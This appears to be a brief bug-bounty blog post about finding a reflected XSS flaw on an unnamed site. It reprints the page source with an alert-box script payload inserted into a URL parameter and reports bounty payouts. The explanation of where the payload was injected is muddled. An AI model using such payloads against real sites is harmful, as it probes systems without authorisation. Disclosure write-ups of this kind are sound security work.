.png)
3 years ago
172 BOOK THIS SPACE FOR AD
ARTICLE AD
Hello guys , that was my first bug in a random program , Reflected xss which was very easy to find .
First I checked the website : example.com , and it was using an anti bots
So i took a look in the page code source and it showed this
<html>
<script async src=’/cdn-cgi/bm/cv/669835187/api.js’></script>
<body>
<script>function login() { document.cookie=”BPC=347afd52f4f4682a435f4a2f37a06739";document.location.href=”https://*/_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D§ions=All&attempt=1";}</script>
<input type=”submit” value=”LOGIN” onclick=”login();”>
<script type=”text/javascript”>(function(){window[‘__CF$cv$params’]={r:’6695b8958f172c9d’,m:’34de24589dc33d306835eb1753ae5d77e1a783ec-1625374104–1800-AeChI8OcP9+n+sA0S5lR5yHBKS5BbXqNJvXORZNTFKYb34JkwF/wvZ2cc1o+/UYnOyDaEETC60bJ4Hx8DTtSDIrqNx6/znWhrcalBxIYSVEKfBJP0WdE4IUaK+1h991z37EtYfnKJTcsY2tVRB4RKUG70l62Xf9NvDzwe4bprEPTZLfkszXOzmaU6dBwkjoKuvcoyoZLUCyevY7XuYO7gqwS51zzFBl97sC5wVCUoJx3T9gHSlMQdW6RTZ/iwlk8ZD37CANEG2/sJpqvZNJ6CCgtedZVwKX8h72LYd8OwMMGMmq1aFVCbxXB8kutP4DPZjQ2lu005NLxOGFbYBYPlgA=’,s:[0xf1ad95421c,0xc5adde3371],}})();</script>
</body>
</html>
So it was so easy for me to put the payload like this :
<html>
<script async src=’/cdn-cgi/bm/cv/669835187/api.js’></script>
<body>
<script>function login() { document.cookie=”BPC=347afd52f4f4682a435f4a2f37a06739";document.location.href=”https://*/_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D§ions=All<script>alert(12345)</script> z<script>alert(1234)</script>
&attempt=1";}</script>
<input type=”submit” value=”LOGIN” onclick=”login();”>
<script type=”text/javascript”>(function(){window[‘__CF$cv$params’]={r:’6695b8958f172c9d’,m:’34de24589dc33d306835eb1753ae5d77e1a783ec-1625374104–1800-AeChI8OcP9+n+sA0S5lR5yHBKS5BbXqNJvXORZNTFKYb34JkwF/wvZ2cc1o+/UYnOyDaEETC60bJ4Hx8DTtSDIrqNx6/znWhrcalBxIYSVEKfBJP0WdE4IUaK+1h991z37EtYfnKJTcsY2tVRB4RKUG70l62Xf9NvDzwe4bprEPTZLfkszXOzmaU6dBwkjoKuvcoyoZLUCyevY7XuYO7gqwS51zzFBl97sC5wVCUoJx3T9gHSlMQdW6RTZ/iwlk8ZD37CANEG2/sJpqvZNJ6CCgtedZVwKX8h72LYd8OwMMGMmq1aFVCbxXB8kutP4DPZjQ2lu005NLxOGFbYBYPlgA=’,s:[0xf1ad95421c,0xc5adde3371],}})();</script>
</body>
</html>
And BOOM :
They awarded me 500$ for this !! so i tried to go deeper and i found more xss vulnerabilities in their website , and i earned with them easy 2000$
Thanks for Reading .
Bengali (Bangladesh) · 
English (United States) ·